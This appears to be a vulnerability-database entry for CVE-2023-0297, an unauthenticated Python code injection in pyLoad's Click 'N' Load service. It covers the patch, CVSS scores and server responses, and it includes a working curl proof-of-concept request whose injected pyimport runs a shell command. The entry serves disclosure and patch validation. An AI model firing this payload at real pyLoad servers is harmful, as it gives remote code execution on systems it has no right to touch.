Attacker Value
Low
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
1

CVE-2023-0297

Disclosure Date: January 14, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.

Add Assessment

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

Description

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and can not be used by external hosts. A secondary “Click ‘N’ Load” service runs on port 9666 and can be used remotely without authentication.

The vulnerability was patched in commit 7d73ba79 by disabling the pyimport statement within the js2py execution environment.

From the original disclosure, the vulnerability can be validated with curl:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:9666/flash/addcrypted2'

Vulnerable instances will respond with a 500 error and a message that the decryption failed.

HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Thu, 16 Feb 2023 17:02:16 GMT
Server: Cheroot/8.6.0

Could not decrypt key

Patched instances (v0.5.0) will also respond with a 500 error but the body of the response will include a stack trace in HTML with the following error:

              <p><b>Error 500: SyntaxError: Line 1: Unexpected token pyimport</b></p>
          
              <p><b>Traceback (most recent call last):</b></p>
          
              <p><b>  File &#34;/usr/lib/python3.10/site-packages/flask/app.py&#34;, line 1820, in full_dispatch_request</b></p>
          
              <p><b>    rv = self.dispatch_request()</b></p>
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • pyload

Products

  • pyload
Technical Analysis